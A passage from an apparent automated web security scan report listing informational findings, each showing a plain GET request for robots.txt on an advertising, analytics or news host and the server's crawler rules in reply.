Last-Modified: Mon, 18 May 2009 07:39:20 GMT
ETag: "3a9d10f-4c-46a2ae4677a00"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Varnish: 1883211998
Date: Mon, 09 May 2011 15:36:03 GMT
Content-Length: 76
Connection: close

# Officer Barbrady says "Nothing to see here...."
User-agent: *
Disallow: /

22.18. http://data.usatoday.net/apps/InsidePage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://data.usatoday.net
Path:   /apps/InsidePage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: data.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1660
Date: Mon, 09 May 2011 15:37:58 GMT
Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

22.19. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_0/StdBannerEx.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ds.serving-sys.com
Path:   /BurstingCachedScripts//SBTemplates_2_3_0/StdBannerEx.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ds.serving-sys.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 16 Jan 2006 13:19:41 GMT
Server: Microsoft-IIS/6.0
Date: Mon, 09 May 2011 15:39:06 GMT
Content-Length: 28
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /

22.20. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: fls.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 15:35:40 GMT
Server: Floodlight server
Cache-Control: private, x-gzip-ok=""
X-XSS-Protection: 1; mode=block

User-Agent: *
Disallow: /
Noindex: /

22.21. http://gannett.gcion.com/addyn/3.0/5111.1/809057/0/-1/ADTECH  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://gannett.gcion.com
Path:   /addyn/3.0/5111.1/809057/0/-1/ADTECH

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: gannett.gcion.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/html
Content-Length: 26

User-agent: *
Disallow: /

22.22. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1030881291/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/viewthroughconversion/1030881291/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 15:35:25 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.23. http://i.usatoday.net/_common/_scripts/_community/lib/usl.photo.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /_common/_scripts/_community/lib/usl.photo.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: i.usatoday.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Fri, 24 Sep 2010 18:31:30 GMT
Accept-Ranges: bytes
ETag: "0eda5b4165ccb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Content-Length: 1660
Date: Mon, 09 May 2011 15:36:39 GMT
Connection: close

# robots.txt for http://www.usatoday.com
sitemap: http://www.usatoday.com/USAToday_sitemap.xml
User-agent:*
Disallow:/feedback
Disallow:/HTML
Disallow:/html
Disallow:/cgi-bin
Disallow:/system

...[SNIP]...

22.24. http://jqueryui.com/ui/jquery.ui.widget.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /ui/jquery.ui.widget.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: jqueryui.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:43:16 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 02 Nov 2010 19:49:40 GMT
ETag: "3f98028-27-4941739b27d00"
Accept-Ranges: bytes
Content-Length: 39
X-Served-By: www3
X-Proxy: 2

User-agent: *
Disallow: /repository/

22.25. http://l.addthiscdn.com/live/t00/250lo.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.addthiscdn.com
Path:   /live/t00/250lo.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: l.addthiscdn.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 07 Apr 2011 11:47:15 GMT
ETag: "de0256-1b-4a052abaf56c0"
Content-Type: text/plain; charset=UTF-8
Date: Mon, 09 May 2011 15:35:19 GMT
Content-Length: 27
Connection: close

User-agent: *
Disallow: *


22.26. http://login.npr.org/openid/embed  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://login.npr.org
Path:   /openid/embed

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: login.npr.org

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 15:39:49 GMT
Content-Type: text/plain
Content-Length: 172
Last-Modified: Thu, 05 May 2011 01:50:05 GMT
Connection: close
Expires: Thu, 31 Dec 2037 23:55:55 GMT
Cache-Control: max-age=315360000
P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT"
Accept-Ranges: bytes

User-agent: *
Disallow: /api/
Disallow: /rp/api/
Disallow: /openid/
Disallow: /stylesheets/
Disallow: /examples/
Disallow: /images/
Sitemap: https://rpxnow.com/sitemap.xml

22.27. http://map.media6degrees.com/orbserv/hbpix  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://map.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: map.media6degrees.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
ETag: W/"36-1274467434000"
Last-Modified: Fri, 21 May 2010 18:43:54 GMT
Content-Type: text/plain
Content-Length: 36
Date: Mon, 09 May 2011 15:35:20 GMT
Connection: close

# go away
User-agent: *
Disallow: /

22.28. http://metrics.csmonitor.com/b/ss/fcocscsm/1/H.21/s92332599295768  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.csmonitor.com
Path:   /b/ss/fcocscsm/1/H.21/s92332599295768

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.csmonitor.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:21 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "351114-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www24
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.29. http://metrics.npr.org/b/ss/nprorg/1/H.17/s91303597942460  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://metrics.npr.org
Path:   /b/ss/nprorg/1/H.17/s91303597942460

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: metrics.npr.org

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:39:57 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:59:57 GMT
ETag: "21c3a7-18-73736540"
Accept-Ranges: bytes
Content-Length: 24
xserver: www400
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.30. http://mobile.fox8live.com/BlackBerry/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mobile.fox8live.com
Path:   /BlackBerry/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: mobile.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/plain
Last-Modified: Fri, 11 Sep 2009 22:46:10 GMT
Accept-Ranges: bytes
ETag: "06517a83133ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:41:46 GMT
Connection: close
Content-Length: 93

User-agent: *
Disallow:/ScriptResource.axd
Disallow:/WebResource.axd
Sitemap:/sitemap.ashx

22.31. http://pagead2.googlesyndication.com/pagead/imgad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pagead2.googlesyndication.com
Path:   /pagead/imgad

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pagead2.googlesyndication.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 15:35:03 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.32. http://pixel.quantserve.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Tue, 10 May 2011 15:35:02 GMT
Content-Type: text/plain
Content-Length: 26
Date: Mon, 09 May 2011 15:35:02 GMT
Server: QS

User-agent: *
Disallow: /

22.33. http://pubads.g.doubleclick.net/gampad/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pubads.g.doubleclick.net
Path:   /gampad/ads

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: pubads.g.doubleclick.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Date: Mon, 09 May 2011 15:35:01 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block

User-Agent: *
Allow: /ads/preferences/
Disallow: /
Noindex: /

22.34. http://s0.2mdn.net/dot.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://s0.2mdn.net
Path:   /dot.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: s0.2mdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Sun, 01 Feb 2009 08:00:00 GMT
Date: Sun, 08 May 2011 20:35:09 GMT
Expires: Thu, 05 May 2011 20:30:09 GMT
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 28
X-XSS-Protection: 1; mode=block
Age: 68396
Cache-Control: public, max-age=86400

User-agent: *
Disallow: /

22.35. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYg4cDIIyHAyoFh8MAAD8yBYPDAAAP  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing-cache.google.com
Path:   /safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYg4cDIIyHAyoFh8MAAD8yBYPDAAAP

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing-cache.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:40:05 GMT
Expires: Mon, 09 May 2011 15:40:05 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.36. http://safebrowsing.clients.google.com/safebrowsing/gethash  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/gethash

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: safebrowsing.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:36:58 GMT
Expires: Mon, 09 May 2011 15:36:58 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.37. http://segment-pixel.invitemedia.com/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:35:40 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.38. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /PointRoll/Ads/PRScript.dll

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:12d1"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:39:56 GMT
Connection: close

User-agent: *
Disallow: /

22.39. http://speed.pointroll.com/PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /PointRoll/Media/Banners/Ford/861911/CommTruck_Season_2010_300x250_DFLT_101410.jpg

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Thu, 15 Sep 2005 12:53:14 GMT
Accept-Ranges: bytes
ETag: "394b626ff4b9c51:527"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:35:10 GMT
Connection: close

User-agent: *
Disallow: /

22.40. http://static.ak.fbcdn.net/connect/xd_proxy.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://static.ak.fbcdn.net
Path:   /connect/xd_proxy.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: static.ak.fbcdn.net

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.138.17.185
Date: Mon, 09 May 2011 15:35:53 GMT
Content-Length: 2553
Connection: close

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.41. http://stp.fox8live.com/common/pagereporting/nettracker/ntpagetag.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://stp.fox8live.com
Path:   /common/pagereporting/nettracker/ntpagetag.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stp.fox8live.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=120
Content-Type: text/plain
Last-Modified: Fri, 11 Sep 2009 22:46:10 GMT
Accept-Ranges: bytes
ETag: "06517a83133ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 15:36:58 GMT
Connection: close
Content-Length: 93

User-agent: *
Disallow:/ScriptResource.axd
Disallow:/WebResource.axd
Sitemap:/sitemap.ashx

22.42. http://t.pointroll.com/PointRoll/Track/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /PointRoll/Track/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 26
Content-Type: text/plain
Last-Modified: Tue, 26 Oct 2010 14:01:22 GMT
Accept-Ranges: bytes
ETag: "43bb7d451675cb1:430"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 09 May 2011 15:40:00 GMT
Connection: close

User-agent: *
Disallow: /

22.43. http://toolbarqueries.clients.google.com/tbproxy/af/query  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://toolbarqueries.clients.google.com
Path:   /tbproxy/af/query

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: toolbarqueries.clients.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:38:06 GMT
Expires: Mon, 09 May 2011 15:38:06 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.44. http://trc.taboolasyndication.com/usatoday/log/2/available  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://trc.taboolasyndication.com
Path:   /usatoday/log/2/available

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trc.taboolasyndication.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:56 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Mon, 02 May 2011 19:45:52 GMT
ETag: "f404d9-41-4a25045625c00"
Accept-Ranges: bytes
Content-Length: 65
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

User-agent: Adsbot-Google
Disallow: /

22.45. http://usatoday1.112.2o7.net/b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s97032880377955  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://usatoday1.112.2o7.net
Path:   /b/ss/usatodayprod,gntbcstglobal/1/H.22.1/s97032880377955

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: usatoday1.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:51 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "36a0e5-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www419
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.46. http://va.px.invitemedia.com/adnxs_imp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://va.px.invitemedia.com
Path:   /adnxs_imp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: va.px.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 09 May 2011 15:37:12 GMT
Content-Type: text/plain
Content-Length: 26

User-agent: *
Disallow: /

22.47. http://w10.localadbuy.com/servlet/ajrotator/550/0/vj  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://w10.localadbuy.com
Path:   /servlet/ajrotator/550/0/vj

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: w10.localadbuy.com

Response

HTTP/1.1 200 OK
Server: JBird/1.0b
Connection: close
Date: Mon, 09 May 2011 15:36:59 GMT
Content-Type: text/plain
Content-Length: 26
Last-Modified: Wed, 08 Dec 2010 22:05:23 GMT

User-agent: *
Disallow: /

22.48. http://widgets.macroaxis.com/widgets/content.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://widgets.macroaxis.com
Path:   /widgets/content.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: widgets.macroaxis.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:48 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Last-Modified: Thu, 19 Feb 2009 05:18:45 GMT
ETag: "2a981a7-5b-4633eab9a9740"
Accept-Ranges: bytes
Content-Length: 91
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /deployment
Allow: /
Sitemap: http://www.macroaxis.com/sitemap.xml

22.49. http://www.collegesurfing.com/searchbox-mge-us.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegesurfing.com
Path:   /searchbox-mge-us.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.collegesurfing.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:35:11 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 05 Mar 2010 17:48:41 GMT
ETag: "193817e-ac-48111536e3040"
Accept-Ranges: bytes
Content-Length: 172
Connection: close
Content-Type: text/plain; charset=UTF-8
Set-Cookie: BIGipServerwww.collegesurfing.com=671219722.20480.0000; path=/

User-agent: *

Disallow: /blank/
Disallow: /canada/
Disallow: /ce/search/results.php
Disallow: /ce/thankyou/
Disallow: /help/
Disallow: /help-center/
Disallow: /js/

22.50. http://www.csmonitor.com/Business  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.csmonitor.com
Path:   /Business

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.csmonitor.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.12 (Ubuntu)
Last-Modified: Fri, 19 Feb 2010 15:46:40 GMT
Served-By:
Content-Type: text/plain
Cache-Control: max-age=83857
Expires: Tue, 10 May 2011 14:52:31 GMT
Date: Mon, 09 May 2011 15:34:54 GMT
Content-Length: 2969
Connection: close

User-agent: Mediapartners-Google*
Disallow: /includes/
Disallow: /keepalive.html

User-agent: *
Disallow: /sudoku
Disallow: /404
Disallow: /Innovation/Horizons/2009/1123/which-best-buy-black-friday-sa
...[SNIP]...

22.51. http://www.facebook.com/plugins/like.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/like.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain;charset=utf-8
X-FB-Server: 10.54.43.33
Connection: close
Content-Length: 2553

# Notice: if you would like to crawl Facebook you can
# contact us here: http://www.facebook.com/apps/site_scraping_tos.php
# to apply for white listing. Our general terms are available
# at http://ww
...[SNIP]...

22.52. http://www.fox8live.com/business/default.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fox8live.com
Path:   /business/default.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fox8live.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:36:55 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n30 ( iad-agg-n18), ms iad-agg-n18 ( origin)
ETag: "06517a83133ca1:0"
Cache-Control: max-age=120
Expires: Mon, 09 May 2011 15:38:55 GMT
Age: 0
Content-Length: 93
Content-Type: text/plain
Last-Modified: Fri, 11 Sep 2009 22:46:10 GMT
Connection: close

User-agent: *
Disallow:/ScriptResource.axd
Disallow:/WebResource.axd
Sitemap:/sitemap.ashx

22.53. http://www.google-analytics.com/__utm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google-analytics.com
Path:   /__utm.gif

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google-analytics.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Mon, 10 Jan 2011 11:53:04 GMT
Date: Mon, 09 May 2011 15:35:44 GMT
Expires: Mon, 09 May 2011 15:35:44 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /siteopt.js
Disallow: /config.js

22.54. http://www.google.com/finance/chart  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance/chart

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.google.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:37:57 GMT
Expires: Mon, 09 May 2011 15:37:57 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.55. http://www.googleadservices.com/pagead/conversion/1030881291/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.googleadservices.com
Path:   /pagead/conversion/1030881291/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.googleadservices.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Thu, 05 May 2011 07:55:46 GMT
Date: Mon, 09 May 2011 15:35:23 GMT
Expires: Mon, 09 May 2011 15:35:23 GMT
Cache-Control: private, max-age=0
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

User-agent: *
Disallow: /search
Disallow: /groups
Disallow: /images
Disallow: /catalogs
Disallow: /catalogues
Disallow: /news
Allow: /news/directory
Disallow: /nwshp
Disallow: /setnewsprefs?
Disallow:
...[SNIP]...

22.56. http://www.groupon.com/subscriptions/new  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.groupon.com
Path:   /subscriptions/new

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.0 200 OK
Server: nginx/0.7.65
Content-Type: text/plain
Accept-Ranges: bytes
Age: 106268
Date: Mon, 09 May 2011 15:35:34 GMT
Last-Modified: Thu, 28 Apr 2011 20:34:00 GMT
Content-Length: 544
Connection: close

sitemap: http://groupon.s3.amazonaws.com/sitemaps/sitemap_index.xml.gz
User-agent: *
Disallow: /deals/update_deal_status
Disallow: /*/community
Disallow: /deals/*/confirmation
Disallow: /deals/*/membe
...[SNIP]...

22.57. https://www.groupon.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.groupon.com
Path:   /login

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.groupon.com

Response

HTTP/1.1 200 OK
Server: EdgePrismSSL
Date: Mon, 09 May 2011 15:35:57 GMT
Content-Type: text/plain
Connection: close
Accept-Ranges: bytes
Age: 64809
Last-Modified: Thu, 18 Nov 2010 03:41:54 GMT
Content-Length: 25

User-agent: *
Disallow: /

22.58. http://www.macroaxis.com/widgets/url.jsp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macroaxis.com
Path:   /widgets/url.jsp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.macroaxis.com

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 15:37:41 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_jk/1.2.28
Last-Modified: Thu, 19 Feb 2009 05:18:45 GMT
ETag: "2c854f-5b-4633eab9a9740"
Accept-Ranges: bytes
Content-Length: 91
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /deployment
Allow: /
Sitemap: http://www.macroaxis.com/sitemap.xml

22.59. http://www.meebo.com/cmd/getrotate  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.meebo.com
Path:   /cmd/getrotate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.meebo.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 09 May 2011 15:35:02 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 99
Last-Modified: Thu, 28 Apr 2011 16:54:16 GMT
Connection: close
